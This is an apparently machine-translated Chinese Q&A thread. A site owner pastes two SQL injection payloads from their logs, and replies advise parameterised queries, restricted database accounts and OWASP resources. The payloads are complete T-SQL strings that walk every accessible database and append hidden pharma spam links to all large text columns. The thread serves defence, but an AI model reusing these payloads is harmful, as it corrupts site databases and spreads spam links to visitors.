我赶上了以下异常在我的日志:有人试图破解我的网站
mt: 15867';declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in
('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '[email protected]+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case
ABS(CHECKSUM(NewId()))%10 when 0 then ''''''+char(60)+''div style="display:none"''+char(62)+''inderal 10mg ''+char(60)+''a href="http:''+char(47)+char(47)+''blog.coepd.com''+char(47)+''page''+char(47)+''Keflex-Pill"''+char(62)+''''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''blog.coepd.com'''' when 1 then ''''blog.coepd.com'''' else
''''blog.coepd.com'''' end +''''''+char(60)+char(47)+''a''+char(62)+'' viagra 25mg''+char(60)+char(47)+''div''+char(62)+'''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in
(2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--<br/> sess: 2<
黑客在开始的那一刻;申报并完成的 - 。我所有的Sql查询都应该被参数化,但如果没有,我需要消除这种威胁。
我最好的选择是什么?我有一个特定的“网络”登录帐户的数据库。最小化此Web登录帐户凭据或拒绝特定的SQL对象的最佳做法是什么?
这个人想要做什么?这里是另一个黑客企图:
;declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into
@w;while @@FETCH_STATUS=0 begin set @s='begin try use '[email protected]+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then ''''''+char(60)+''div style="display:none"''+char(62)+''tadalafil 40mg ''+char(60)+''a
href="http:''+char(47)+char(47)+''www.guitar-frets.com''+char(47)+''blog''+char(47)+''page''+char(47)+''synthroid-200mcg.aspx"''+char(62)+''''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''levofloxacin 750mg'''' when 1 then ''''guitar-frets.com'''' else ''''guitar-frets.com'''' end +''''''+char(60)+char(47)+''a''+char(62)+'' valacyclovir
pill''+char(60)+char(47)+''div''+char(62)+'''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin
exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--<br
这里是我的日志的快照。如果你从底部到顶部看,你可以看到这个黑客正在尝试每个参数来注入他的代码。
确实很简单:确保您为这个确切原因对SQL查询进行参数化。创建一个只能访问特定数据库(或数据库)的用户帐户。安装SQL Server的服务器只拒绝来自指定IP地址的任何连接。 –
获取过程。你是否在vpn上,有时是在通过服务器爬取进行备份时 – hemanjosko
OWASP基金会有你需要知道的一切:https://www.owasp.org/index.php/Category:OWASP_Guide_Project –